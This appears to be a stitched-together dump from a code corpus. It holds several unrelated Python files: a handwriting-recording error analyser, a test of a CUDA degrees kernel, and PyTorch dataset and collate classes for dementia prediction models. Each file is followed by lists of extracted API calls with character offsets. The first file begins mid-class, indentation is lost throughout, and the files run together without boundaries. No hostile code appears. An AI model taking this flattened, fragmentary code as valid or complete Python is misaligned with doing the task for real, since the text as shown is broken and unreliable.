def __str__(self):
return "AnalyzeErrors"
def _write_data(
self,
symbols,
err_recs,
nr_recordings,
total_error_count,
percentages,
time_max_list,
):
"""Write all obtained data to a file.
Parameters
----------
symbols : list of tuples (String, non-negative int)
List of all symbols with the count of recordings
err_recs : dictionary
count of recordings by error type
nr_recordings : non-negative int
number of recordings
total_error_count : dictionary
Count of all error that have happened by type
percentages : list
List of all recordings where removing the dots changed the size of
the bounding box.
time_max_list : list
List of all recordings where the recording time is above a
threshold.
"""
write_file = open(self.filename, "a") # noqa
s = ""
for symbol, count in sorted(symbols.items(), key=lambda n: n[0]):
if symbol in ["a", "0", "A"]:
s += "\n%s (%i), " % (symbol, count)
elif symbol in ["z", "9", "Z"]:
s += "%s (%i) \n" % (symbol, count)
else:
s += "%s (%i), " % (symbol, count)
print("## Data", file=write_file)
print("Symbols: %i" % len(symbols), file=write_file)
print("Recordings: %i" % sum(symbols.values()), file=write_file)
print("```", file=write_file)
print(s[:-1], file=write_file)
print("```", file=write_file)
# Show errors
print(
"Recordings with wild points: %i (%0.2f%%)"
% (
err_recs["wild_points"],
float(err_recs["wild_points"]) / nr_recordings * 100,
),
file=write_file,
)
print("wild points: %i" % total_error_count["wild_points"], file=write_file)
print(
"Recordings with missing stroke: %i (%0.2f%%)"
% (
err_recs["missing_stroke"],
float(err_recs["missing_stroke"]) / nr_recordings * 100,
),
file=write_file,
)
print(
"Recordings with errors: %i (%0.2f%%)"
% (err_recs["total"], float(err_recs["total"]) / nr_recordings * 100),
file=write_file,
)
print(
"Recordings with dots: %i (%0.2f%%)"
% (
err_recs["single_dots"],
float(err_recs["single_dots"]) / nr_recordings * 100,
),
file=write_file,
)
print("dots: %i" % total_error_count["single_dots"], file=write_file)
print(
"size changing removal: %i (%0.2f%%)"
% (len(percentages), float(len(percentages)) / nr_recordings * 100),
file=write_file,
)
print(
"%i recordings took more than %i ms. That were: "
% (len(time_max_list), self.time_max_threshold),
file=write_file,
)
for recording in time_max_list:
print(
"* %ims: %s: %s"
% (
recording.get_time(),
utils.get_readable_time(recording.get_time()),
recording,
),
file=write_file,
)
write_file.close()
def __call__(self, raw_datasets):
# Initialize variables
symbols = defaultdict(int)
# Count errornous recordings
err_recs = {
"wild_points": 0,
"missing_stroke": 0,
"single_dots": 0, # except symbols_with_dots
"total": 0,
}
# Count errors (one type of error might occur multiple times in
# a single recording)
total_error_count = {"wild_points": 0, "single_dots": 0}
percentages = []
# List with recordings that are over the time maximum
time_max_list = []
for raw_dataset in raw_datasets:
recording = raw_dataset["handwriting"]
symbols[recording.formula_in_latex] += 1
if recording.get_time() > self.time_max_threshold:
time_max_list.append(recording)
if recording.wild_point_count > 0:
err_recs["wild_points"] += 1
total_error_count["wild_points"] += recording.wild_point_count
err_recs["missing_stroke"] += recording.missing_stroke
if recording.wild_point_count > 0 or recording.missing_stroke:
err_recs["total"] += 1
if (
recording.count_single_dots() > 0
and raw_dataset["formula_in_latex"] not in self.dot_symbols
and "dots" not in raw_dataset["formula_in_latex"]
):
err_recs["single_dots"] += 1
old_area = recording.get_area()
tmp = [preprocessing.RemoveDots()]
recording.preprocessing(tmp)
new_area = recording.get_area()
percentage = float(new_area) / float(old_area)
if percentage < 1.0:
percentages.append(percentage)
total_error_count["single_dots"] += recording.count_single_dots()
time_max_list = sorted(time_max_list, key=lambda n: n.get_time(), reverse=True)
self._write_data(
symbols,
err_recs,
len(raw_datasets),
total_error_count,
percentages,
time_max_list,
)
|
[
"logging.getLogger",
"os.path.exists",
"numpy.mean",
"os.makedirs",
"numpy.average",
"os.path.join",
"collections.defaultdict",
"numpy.std",
"math.hypot",
"time.time"
] |
[((1294, 1321), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1311, 1321), False, 'import logging\n'), ((1918, 1951), 'os.path.join', 'os.path.join', (['directory', 'filename'], {}), '(directory, filename)\n', (1930, 1951), False, 'import os\n'), ((3211, 3228), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3222, 3228), False, 'from collections import defaultdict\n'), ((1841, 1866), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (1855, 1866), False, 'import os\n'), ((1876, 1898), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (1887, 1898), False, 'import os\n'), ((9196, 9207), 'time.time', 'time.time', ([], {}), '()\n', (9205, 9207), False, 'import time\n'), ((14570, 14586), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (14581, 14586), False, 'from collections import defaultdict\n'), ((4311, 4327), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4322, 4327), False, 'from collections import defaultdict\n'), ((4353, 4364), 'time.time', 'time.time', ([], {}), '()\n', (4362, 4364), False, 'import time\n'), ((5524, 5535), 'time.time', 'time.time', ([], {}), '()\n', (5533, 5535), False, 'import time\n'), ((7263, 7274), 'time.time', 'time.time', ([], {}), '()\n', (7272, 7274), False, 'import time\n'), ((6603, 6625), 'numpy.mean', 'numpy.mean', (['print_data'], {}), '(print_data)\n', (6613, 6625), False, 'import numpy\n'), ((6680, 6701), 'numpy.std', 'numpy.std', (['print_data'], {}), '(print_data)\n', (6689, 6701), False, 'import numpy\n'), ((8210, 8232), 'numpy.mean', 'numpy.mean', (['print_data'], {}), '(print_data)\n', (8220, 8232), False, 'import numpy\n'), ((8297, 8318), 'numpy.std', 'numpy.std', (['print_data'], {}), '(print_data)\n', (8306, 8318), False, 'import numpy\n'), ((7720, 7784), 'math.hypot', 'math.hypot', (["(point1['x'] - point2['x'])", "(point1['y'] - point2['y'])"], {}), "(point1['x'] - point2['x'], point1['y'] - point2['y'])\n", (7730, 7784), False, 'import math\n'), ((5938, 6008), 'math.hypot', 'math.hypot', (["(last_point['x'] - point['x'])", "(last_point['y'] - point['y'])"], {}), "(last_point['x'] - point['x'], last_point['y'] - point['y'])\n", (5948, 6008), False, 'import math\n'), ((10141, 10159), 'numpy.average', 'numpy.average', (['tmp'], {}), '(tmp)\n', (10154, 10159), False, 'import numpy\n'), ((10365, 10383), 'numpy.average', 'numpy.average', (['tmp'], {}), '(tmp)\n', (10378, 10383), False, 'import numpy\n')]
|
from __future__ import print_function
import numpy as np
from kernel_tuner import run_kernel
from .context import skip_if_no_cuda_device, create_plot
from km3net.util import get_kernel_path, generate_correlations_table
def test_degrees_kernel():
skip_if_no_cuda_device()
def in_degrees(correlations):
degrees = np.zeros(correlations.shape[1])
for i in range(correlations.shape[1]):
in_degree = 0
for j in range(correlations.shape[0]):
col = i-j-1
if col>=0:
in_degree += correlations[j, col]
degrees[i] = in_degree
return degrees
with open(get_kernel_path()+'degrees.cu', 'r') as f:
kernel_string = f.read()
N = np.int32(400)
sliding_window_width = np.int32(150)
problem_size = (N, 1)
#generate input data with an expected density of correlated hits
correlations = generate_correlations_table(N, sliding_window_width, cutoff=2.87)
#compute reference answer
in_degree = in_degrees(correlations)
out_degree = np.sum(correlations, axis=0).astype(np.int32)
reference = (in_degree+out_degree)
#call the CUDA kernel
args = [out_degree, correlations, N]
params = { "block_size_x": 256, 'window_width': sliding_window_width }
answer = run_kernel("degrees_dense", kernel_string, problem_size, args, params)
print("answer", answer[0])
print("reference", reference)
#verify
test_result = np.sum(answer[0] - reference) == 0
if not test_result == True:
print("test degrees_dense FAILED, attempting to create a plot for visual comparison")
create_plot(reference.reshape(20,20), answer[0].reshape(20,20))
assert test_result
|
[
"km3net.util.generate_correlations_table",
"km3net.util.get_kernel_path",
"numpy.int32",
"numpy.sum",
"numpy.zeros",
"kernel_tuner.run_kernel"
] |
[((754, 767), 'numpy.int32', 'np.int32', (['(400)'], {}), '(400)\n', (762, 767), True, 'import numpy as np\n'), ((795, 808), 'numpy.int32', 'np.int32', (['(150)'], {}), '(150)\n', (803, 808), True, 'import numpy as np\n'), ((924, 989), 'km3net.util.generate_correlations_table', 'generate_correlations_table', (['N', 'sliding_window_width'], {'cutoff': '(2.87)'}), '(N, sliding_window_width, cutoff=2.87)\n', (951, 989), False, 'from km3net.util import get_kernel_path, generate_correlations_table\n'), ((1320, 1390), 'kernel_tuner.run_kernel', 'run_kernel', (['"""degrees_dense"""', 'kernel_string', 'problem_size', 'args', 'params'], {}), "('degrees_dense', kernel_string, problem_size, args, params)\n", (1330, 1390), False, 'from kernel_tuner import run_kernel\n'), ((331, 362), 'numpy.zeros', 'np.zeros', (['correlations.shape[1]'], {}), '(correlations.shape[1])\n', (339, 362), True, 'import numpy as np\n'), ((1488, 1517), 'numpy.sum', 'np.sum', (['(answer[0] - reference)'], {}), '(answer[0] - reference)\n', (1494, 1517), True, 'import numpy as np\n'), ((1079, 1107), 'numpy.sum', 'np.sum', (['correlations'], {'axis': '(0)'}), '(correlations, axis=0)\n', (1085, 1107), True, 'import numpy as np\n'), ((669, 686), 'km3net.util.get_kernel_path', 'get_kernel_path', ([], {}), '()\n', (684, 686), False, 'from km3net.util import get_kernel_path, generate_correlations_table\n')]
|
import numpy as np
import torch
import torch.nn.functional as F
from scipy.sparse import coo_matrix
from sklearn.preprocessing import StandardScaler
from torch.utils.data import Dataset
from torch_geometric.data import InMemoryDataset, Data, Batch
from tqdm.auto import tqdm
from utils.data_utils import window_data_sorted, add_age_gender
class GraphDataset(InMemoryDataset):
"""
Dataset to use for graph neural networks.
"""
def __init__(self, root='/data/home/efridgeirsson/projects/dementia/data/sequence_dementia'):
super(GraphDataset, self).__init__(root)
self.data, self.slices = torch.load(self.processed_paths[0])
self.labels = self.data.y
@property
def num_features(self):
return len(self.data.x.unique())
@property
def raw_file_names(self):
return ['python_data']
@property
def processed_file_names(self):
return ['dementia.dataset']
def download(self):
pass
def process(self):
data = torch.load(self.raw_paths[0])
old_covariate_ids = data['map'].oldCovariateId
covariate_ref = data['covariateRef']
feature_names = covariate_ref[covariate_ref.covariateId.isin(old_covariate_ids)].covariateName.values
window_lengths = (30, 180, 365)
feature_matrix_counts, windowed_feature_names = window_data_sorted(
window_lengths=list(window_lengths),
feature_matrix=data['data'].coalesce(),
all_feature_names=feature_names)
feature_matrix_counts = feature_matrix_counts.T
feature_matrix_counts.data = np.clip(feature_matrix_counts.data, 0, 1) # counts to binary
feature_matrix_counts, windowed_feature_names = add_age_gender(feature_matrix_counts,
data['nonTemporalData'],
windowed_feature_names,
age_normalized=False)
train_index = data['population'][data['population']['index'] >= 0].index.values
test_index = data['population'][data['population']['index'] < 0.0].index.values
encounter_data = feature_matrix_counts[:, :-4]
demographic_data = feature_matrix_counts[:, -4:].toarray()
scaler = StandardScaler()
demographic_data[train_index, :-1] = scaler.fit_transform(demographic_data[train_index, :-1])
demographic_data[test_index, :-1] = scaler.transform(demographic_data[test_index, :-1])
outcomes = torch.as_tensor(data['population'].outcomeCount.values, dtype=torch.float32)
demographic_data = torch.as_tensor(demographic_data, dtype=torch.float32)
patients = [p for p in range(encounter_data.shape[0])]
data_list = self.process_patient(patients, demographic_data, encounter_data, outcomes)
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
@staticmethod
def process_patient(patient_idxs, demographic_data=None, encounter_data=None, outcomes=None):
data = []
for patient_idx in tqdm(patient_idxs):
patient_data = encounter_data[patient_idx, :].toarray()
source_nodes = torch.as_tensor(patient_data.nonzero()[1], dtype=torch.long)
num_nodes = len(source_nodes)
source_nodes = source_nodes[None, :]
normalized_source_nodes = torch.as_tensor((range(len(source_nodes.unique()))))
edge_index = torch.cat((normalized_source_nodes.repeat(1, num_nodes),
normalized_source_nodes.repeat(num_nodes, 1).transpose(0, 1).contiguous().view(
(1, num_nodes ** 2))), dim=0)
# add extra node for classification
output_nodes = torch.cat((source_nodes[0, :], torch.as_tensor([patient_data.shape[1]])))
output_nodes = output_nodes[None, :]
normalized_output_nodes = torch.as_tensor((range(len(output_nodes.unique()))))
output_edge_index = torch.cat((normalized_output_nodes.repeat(1, num_nodes + 1),
normalized_output_nodes.repeat(num_nodes + 1, 1).transpose(0,
1).contiguous().view(
(1, (num_nodes + 1) ** 2))), dim=0)
dem_data = demographic_data[patient_idx, :]
y = outcomes[patient_idx]
data.append(Data(x=output_nodes.transpose(0, 1), edge_index=edge_index.long(),
output_edge_index=output_edge_index.long(), y=y,
demographic=dem_data[None, :]))
return data
def graph_collate(batch):
"""
Collate function to use with graph datasets.
Parameters
----------
batch :
Returns
-------
"""
elem = batch[0]
if isinstance(elem, Data):
batch = Batch.from_data_list(batch)
return batch, batch.y
class SARDData(Dataset):
"""
Dataset class used for the original SARD implementation.
"""
def __init__(self, indices, non_temporal, train_indices, outcomes, linear_predictions=None,
distill=True):
"""
Parameters
----------
indices : dict with train, val and test indices
outcomes : outcome labels
linear_predictions : predictions from previous model to distill
distill : if run for distillation or not, if distillation then get_item returns also predictions
of already fit model
"""
self.distill = distill
self.outcomes = outcomes
self.linear_predictions = linear_predictions
self.indices = indices
# fix r to py
non_temporal.rowIdPython = non_temporal.rowIdPython - 1
# extract age and other covariates
age_id = 1002
age_df = non_temporal[non_temporal.covariateId == age_id]
age_df = age_df.sort_values(by='rowIdPython')
age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
age_squared = age ** 2
age_sqrt = torch.sqrt(age)
ages = torch.stack([age, age_squared, age_sqrt]).T
scaler = StandardScaler()
scaler.fit(ages[train_indices])
ages = scaler.transform(ages)
# other covariates
other_df = non_temporal[non_temporal.covariateId != age_id].sort_values(by='rowIdPython')
not_age = torch.zeros((len(ages)))
not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
self.num = torch.cat([ages, not_age[:, None]], dim=1)
def __len__(self):
return len(self.indices)
def __getitem__(self, item):
if self.distill:
return (self.indices[item], self.num[item]), (
self.outcomes[self.indices[item]], self.linear_predictions[self.indices[item]])
else:
return (self.indices[item], self.num[item]), self.outcomes[self.indices[item]]
class VisitSequenceWithLabelDataset(Dataset):
"""
Dataset class that uses lists of lists
"""
def __init__(self, seqs, labels, num_features, non_temporal_data, visits, train_indices, reverse=False):
"""
Args:
seqs (list): list of patients (list) of visits (list) of codes (int) that contains visit sequences
labels (list): list of labels (int)
num_features (int): number of total features available
non_temporal_data (dataframe): dataframe with nonTemporalData such as age or gender.
visits (list): list of patients with timeId of visits
train_indices (): indices of training set, used for operations that should only use info from training set
reverse (bool): If true, reverse the order of sequence (for RETAIN)
"""
if len(seqs) != len(labels):
raise ValueError("Sequences and Labels have different lengths")
# fix r to py
non_temporal_data.rowIdPython = non_temporal_data.rowIdPython - 1
# extract age and other covariates
age_id = 1002
age_df = non_temporal_data[non_temporal_data.covariateId == age_id]
age_df = age_df.sort_values(by='rowIdPython')
age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
age_squared = age ** 2
age_sqrt = torch.sqrt(age)
ages = torch.stack([age, age_squared, age_sqrt]).T
scaler = StandardScaler()
scaler.fit(ages[train_indices])
ages = torch.as_tensor(scaler.transform(ages), dtype=torch.float32)
# other covariates
other_df = non_temporal_data[non_temporal_data.covariateId != age_id].sort_values(by='rowIdPython')
not_age = torch.zeros((len(seqs)))
not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
self.train_indices = train_indices
self.num = torch.cat([ages, not_age[:, None]], dim=1)
n_visits = [len(v) for v in visits]
self.max_visits = np.percentile(n_visits, 99).astype(int)
self.num_features = num_features
self.visits = torch.vstack(
[F.pad(torch.as_tensor(v, dtype=torch.long), (0, self.max_visits - len(v))) for v in visits])
self.seqs = []
self.lengths = []
for i, (seq, label) in tqdm(enumerate(zip(seqs, labels))):
if reverse:
sequence = list(reversed(seq))
else:
sequence = seq
row = []
col = []
val = []
for j, visit in enumerate(sequence):
for code in visit:
if code < num_features:
row.append(j)
col.append(code)
val.append(1.0)
if len(sequence) < self.max_visits:
self.seqs.append(coo_matrix((np.array(val, dtype=np.float32), (np.array(row), np.array(col))),
shape=(self.max_visits, num_features)))
self.lengths.append(len(sequence))
else:
ix = np.array(row) < self.max_visits # truncate to max visits
self.seqs.append(
coo_matrix((np.array(val, dtype=np.float32)[ix], (np.array(row)[ix], np.array(col)[ix])),
shape=(self.max_visits, num_features)))
self.lengths.append(self.max_visits)
self.labels = torch.as_tensor(labels, dtype=torch.float32)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
self.lengths[index], self.visits[index]
class DistillDataset(VisitSequenceWithLabelDataset):
"""
Dataset class for the distillation where I needed to add the predictions from the teacher model
"""
def __init__(self, linear_predictions=None, distill=True, **kwargs):
super(DistillDataset, self).__init__(**kwargs)
self.distill = distill
self.linear_predictions = torch.as_tensor(linear_predictions.values, dtype=torch.float32)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
if self.distill:
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.linear_predictions[index], \
self.labels[index], \
self.lengths[index], self.visits[index]
else:
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
self.lengths[index], self.visits[index]
class RETAIN_dataset(Dataset):
"""
RETAIN is an RNN and so doesn't need to pad the input but can work with variable length sequences so I used
this class that doesn't pad the input.
"""
def __init__(self, seqs, labels, num_features, non_temporal_data, visits, train_indices, reverse=True):
"""
Args:
seqs (list): list of patients (list) of visits (list) of codes (int) that contains visit sequences
labels (list): list of labels (int)
num_features (int): number of total features available
non_temporal_data (dataframe): dataframe with nonTemporalData such as age or gender.
visits (list): list of patients with timeId of visits
train_indices (): indices of training set, used for operations that should only use info from training set
reverse (bool): If true, reverse the order of sequence (for RETAIN)
"""
if len(seqs) != len(labels):
raise ValueError("Sequences and Labels have different lengths")
# fix r to py
non_temporal_data.rowIdPython = non_temporal_data.rowIdPython - 1
# extract age and other covariates
age_id = 1002
age_df = non_temporal_data[non_temporal_data.covariateId == age_id]
age_df = age_df.sort_values(by='rowIdPython')
age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
age_squared = age ** 2
age_sqrt = torch.sqrt(age)
ages = torch.stack([age, age_squared, age_sqrt]).T
age_maxes = torch.max(ages[train_indices], dim=0).values
ages = ages / age_maxes
# other covariates
other_df = non_temporal_data[non_temporal_data.covariateId != age_id].sort_values(by='rowIdPython')
not_age = torch.zeros((len(seqs)))
not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
self.num = torch.cat([ages, not_age[:, None]], dim=1)
self.visits = visits
self.seqs = []
self.lengths = []
for i, (seq, label) in enumerate(zip(seqs, labels)):
if reverse:
sequence = list(reversed(seq))
else:
sequence = seq
row = []
col = []
val = []
for j, visit in enumerate(sequence):
for code in visit:
if code < num_features:
row.append(j)
col.append(code)
val.append(1.0)
self.seqs.append(coo_matrix((np.array(val, dtype=np.float32), (np.array(row), np.array(col))),
shape=(len(sequence), num_features)))
self.lengths.append(len(sequence))
self.labels = torch.as_tensor(labels, dtype=torch.long)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
self.lengths[index], self.visits[index]
def pad(batch):
"""
Collate function that I use with RETAIN and the vanilla Transformer.
Parameters
----------
batch :
Returns
-------
"""
batch_split = list(zip(*batch))
seqs, num, targs, lengths, visits = batch_split[0], batch_split[1], batch_split[2], batch_split[3], batch_split[4]
num = torch.vstack([torch.as_tensor(sample, dtype=torch.float32) for sample in zip(*num)]).T
visits = [torch.as_tensor(s, dtype=torch.long) for s in visits]
return [list(seqs), num, torch.as_tensor(lengths, dtype=torch.long), visits], \
torch.as_tensor(targs, dtype=torch.float32)
def distill_pad(batch):
"""
Collate function I use when distilling
Parameters
----------
batch :
Returns
-------
"""
batch_split = list(zip(*batch))
seqs, num, preds, targs, lengths, visits = batch_split[0], batch_split[1], batch_split[2], batch_split[3], \
batch_split[4], batch_split[5]
num = torch.vstack([torch.as_tensor(sample, dtype=torch.float32) for sample in zip(*num)]).T
visits = [torch.as_tensor(s, dtype=torch.long) for s in visits]
return [list(seqs), num, torch.as_tensor(lengths, dtype=torch.long), visits], \
[torch.as_tensor(targs, dtype=torch.float32), torch.as_tensor(preds, dtype=torch.float32)]
|
[
"numpy.clip",
"torch.as_tensor",
"torch.load",
"torch.stack",
"torch.sqrt",
"torch.max",
"sklearn.preprocessing.StandardScaler",
"numpy.array",
"torch_geometric.data.Batch.from_data_list",
"torch.save",
"tqdm.auto.tqdm",
"numpy.percentile",
"utils.data_utils.add_age_gender",
"torch.cat"
] |
[((622, 657), 'torch.load', 'torch.load', (['self.processed_paths[0]'], {}), '(self.processed_paths[0])\n', (632, 657), False, 'import torch\n'), ((1016, 1045), 'torch.load', 'torch.load', (['self.raw_paths[0]'], {}), '(self.raw_paths[0])\n', (1026, 1045), False, 'import torch\n'), ((1611, 1652), 'numpy.clip', 'np.clip', (['feature_matrix_counts.data', '(0)', '(1)'], {}), '(feature_matrix_counts.data, 0, 1)\n', (1618, 1652), True, 'import numpy as np\n'), ((1729, 1841), 'utils.data_utils.add_age_gender', 'add_age_gender', (['feature_matrix_counts', "data['nonTemporalData']", 'windowed_feature_names'], {'age_normalized': '(False)'}), "(feature_matrix_counts, data['nonTemporalData'],\n windowed_feature_names, age_normalized=False)\n", (1743, 1841), False, 'from utils.data_utils import window_data_sorted, add_age_gender\n'), ((2368, 2384), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (2382, 2384), False, 'from sklearn.preprocessing import StandardScaler\n'), ((2602, 2678), 'torch.as_tensor', 'torch.as_tensor', (["data['population'].outcomeCount.values"], {'dtype': 'torch.float32'}), "(data['population'].outcomeCount.values, dtype=torch.float32)\n", (2617, 2678), False, 'import torch\n'), ((2706, 2760), 'torch.as_tensor', 'torch.as_tensor', (['demographic_data'], {'dtype': 'torch.float32'}), '(demographic_data, dtype=torch.float32)\n', (2721, 2760), False, 'import torch\n'), ((2976, 3027), 'torch.save', 'torch.save', (['(data, slices)', 'self.processed_paths[0]'], {}), '((data, slices), self.processed_paths[0])\n', (2986, 3027), False, 'import torch\n'), ((3190, 3208), 'tqdm.auto.tqdm', 'tqdm', (['patient_idxs'], {}), '(patient_idxs)\n', (3194, 3208), False, 'from tqdm.auto import tqdm\n'), ((5087, 5114), 'torch_geometric.data.Batch.from_data_list', 'Batch.from_data_list', (['batch'], {}), '(batch)\n', (5107, 5114), False, 'from torch_geometric.data import InMemoryDataset, Data, Batch\n'), ((6232, 6298), 'torch.as_tensor', 'torch.as_tensor', (['age_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(age_df.covariateValue.values, dtype=torch.float32)\n', (6247, 6298), False, 'import torch\n'), ((6349, 6364), 'torch.sqrt', 'torch.sqrt', (['age'], {}), '(age)\n', (6359, 6364), False, 'import torch\n'), ((6441, 6457), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (6455, 6457), False, 'from sklearn.preprocessing import StandardScaler\n'), ((6752, 6820), 'torch.as_tensor', 'torch.as_tensor', (['other_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(other_df.covariateValue.values, dtype=torch.float32)\n', (6767, 6820), False, 'import torch\n'), ((6841, 6883), 'torch.cat', 'torch.cat', (['[ages, not_age[:, None]]'], {'dim': '(1)'}), '([ages, not_age[:, None]], dim=1)\n', (6850, 6883), False, 'import torch\n'), ((8497, 8563), 'torch.as_tensor', 'torch.as_tensor', (['age_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(age_df.covariateValue.values, dtype=torch.float32)\n', (8512, 8563), False, 'import torch\n'), ((8614, 8629), 'torch.sqrt', 'torch.sqrt', (['age'], {}), '(age)\n', (8624, 8629), False, 'import torch\n'), ((8706, 8722), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (8720, 8722), False, 'from sklearn.preprocessing import StandardScaler\n'), ((9065, 9133), 'torch.as_tensor', 'torch.as_tensor', (['other_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(other_df.covariateValue.values, dtype=torch.float32)\n', (9080, 9133), False, 'import torch\n'), ((9197, 9239), 'torch.cat', 'torch.cat', (['[ages, not_age[:, None]]'], {'dim': '(1)'}), '([ages, not_age[:, None]], dim=1)\n', (9206, 9239), False, 'import torch\n'), ((10765, 10809), 'torch.as_tensor', 'torch.as_tensor', (['labels'], {'dtype': 'torch.float32'}), '(labels, dtype=torch.float32)\n', (10780, 10809), False, 'import torch\n'), ((11426, 11489), 'torch.as_tensor', 'torch.as_tensor', (['linear_predictions.values'], {'dtype': 'torch.float32'}), '(linear_predictions.values, dtype=torch.float32)\n', (11441, 11489), False, 'import torch\n'), ((13340, 13406), 'torch.as_tensor', 'torch.as_tensor', (['age_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(age_df.covariateValue.values, dtype=torch.float32)\n', (13355, 13406), False, 'import torch\n'), ((13457, 13472), 'torch.sqrt', 'torch.sqrt', (['age'], {}), '(age)\n', (13467, 13472), False, 'import torch\n'), ((13855, 13923), 'torch.as_tensor', 'torch.as_tensor', (['other_df.covariateValue.values'], {'dtype': 'torch.float32'}), '(other_df.covariateValue.values, dtype=torch.float32)\n', (13870, 13923), False, 'import torch\n'), ((13944, 13986), 'torch.cat', 'torch.cat', (['[ages, not_age[:, None]]'], {'dim': '(1)'}), '([ages, not_age[:, None]], dim=1)\n', (13953, 13986), False, 'import torch\n'), ((14814, 14855), 'torch.as_tensor', 'torch.as_tensor', (['labels'], {'dtype': 'torch.long'}), '(labels, dtype=torch.long)\n', (14829, 14855), False, 'import torch\n'), ((15548, 15584), 'torch.as_tensor', 'torch.as_tensor', (['s'], {'dtype': 'torch.long'}), '(s, dtype=torch.long)\n', (15563, 15584), False, 'import torch\n'), ((15697, 15740), 'torch.as_tensor', 'torch.as_tensor', (['targs'], {'dtype': 'torch.float32'}), '(targs, dtype=torch.float32)\n', (15712, 15740), False, 'import torch\n'), ((16233, 16269), 'torch.as_tensor', 'torch.as_tensor', (['s'], {'dtype': 'torch.long'}), '(s, dtype=torch.long)\n', (16248, 16269), False, 'import torch\n'), ((6380, 6421), 'torch.stack', 'torch.stack', (['[age, age_squared, age_sqrt]'], {}), '([age, age_squared, age_sqrt])\n', (6391, 6421), False, 'import torch\n'), ((8645, 8686), 'torch.stack', 'torch.stack', (['[age, age_squared, age_sqrt]'], {}), '([age, age_squared, age_sqrt])\n', (8656, 8686), False, 'import torch\n'), ((13488, 13529), 'torch.stack', 'torch.stack', (['[age, age_squared, age_sqrt]'], {}), '([age, age_squared, age_sqrt])\n', (13499, 13529), False, 'import torch\n'), ((13552, 13589), 'torch.max', 'torch.max', (['ages[train_indices]'], {'dim': '(0)'}), '(ages[train_indices], dim=0)\n', (13561, 13589), False, 'import torch\n'), ((15631, 15673), 'torch.as_tensor', 'torch.as_tensor', (['lengths'], {'dtype': 'torch.long'}), '(lengths, dtype=torch.long)\n', (15646, 15673), False, 'import torch\n'), ((16316, 16358), 'torch.as_tensor', 'torch.as_tensor', (['lengths'], {'dtype': 'torch.long'}), '(lengths, dtype=torch.long)\n', (16331, 16358), False, 'import torch\n'), ((16383, 16426), 'torch.as_tensor', 'torch.as_tensor', (['targs'], {'dtype': 'torch.float32'}), '(targs, dtype=torch.float32)\n', (16398, 16426), False, 'import torch\n'), ((16428, 16471), 'torch.as_tensor', 'torch.as_tensor', (['preds'], {'dtype': 'torch.float32'}), '(preds, dtype=torch.float32)\n', (16443, 16471), False, 'import torch\n'), ((9310, 9337), 'numpy.percentile', 'np.percentile', (['n_visits', '(99)'], {}), '(n_visits, 99)\n', (9323, 9337), True, 'import numpy as np\n'), ((15461, 15505), 'torch.as_tensor', 'torch.as_tensor', (['sample'], {'dtype': 'torch.float32'}), '(sample, dtype=torch.float32)\n', (15476, 15505), False, 'import torch\n'), ((16146, 16190), 'torch.as_tensor', 'torch.as_tensor', (['sample'], {'dtype': 'torch.float32'}), '(sample, dtype=torch.float32)\n', (16161, 16190), False, 'import torch\n'), ((3924, 3964), 'torch.as_tensor', 'torch.as_tensor', (['[patient_data.shape[1]]'], {}), '([patient_data.shape[1]])\n', (3939, 3964), False, 'import torch\n'), ((9446, 9482), 'torch.as_tensor', 'torch.as_tensor', (['v'], {'dtype': 'torch.long'}), '(v, dtype=torch.long)\n', (9461, 9482), False, 'import torch\n'), ((10416, 10429), 'numpy.array', 'np.array', (['row'], {}), '(row)\n', (10424, 10429), True, 'import numpy as np\n'), ((14601, 14632), 'numpy.array', 'np.array', (['val'], {'dtype': 'np.float32'}), '(val, dtype=np.float32)\n', (14609, 14632), True, 'import numpy as np\n'), ((10176, 10207), 'numpy.array', 'np.array', (['val'], {'dtype': 'np.float32'}), '(val, dtype=np.float32)\n', (10184, 10207), True, 'import numpy as np\n'), ((14635, 14648), 'numpy.array', 'np.array', (['row'], {}), '(row)\n', (14643, 14648), True, 'import numpy as np\n'), ((14650, 14663), 'numpy.array', 'np.array', (['col'], {}), '(col)\n', (14658, 14663), True, 'import numpy as np\n'), ((10210, 10223), 'numpy.array', 'np.array', (['row'], {}), '(row)\n', (10218, 10223), True, 'import numpy as np\n'), ((10225, 10238), 'numpy.array', 'np.array', (['col'], {}), '(col)\n', (10233, 10238), True, 'import numpy as np\n'), ((10540, 10571), 'numpy.array', 'np.array', (['val'], {'dtype': 'np.float32'}), '(val, dtype=np.float32)\n', (10548, 10571), True, 'import numpy as np\n'), ((10578, 10591), 'numpy.array', 'np.array', (['row'], {}), '(row)\n', (10586, 10591), True, 'import numpy as np\n'), ((10597, 10610), 'numpy.array', 'np.array', (['col'], {}), '(col)\n', (10605, 10610), True, 'import numpy as np\n')]
|
#! /usr/bin/env python
# -*- coding: utf8 -*-
import numpy as np
import matplotlib.pyplot as plt
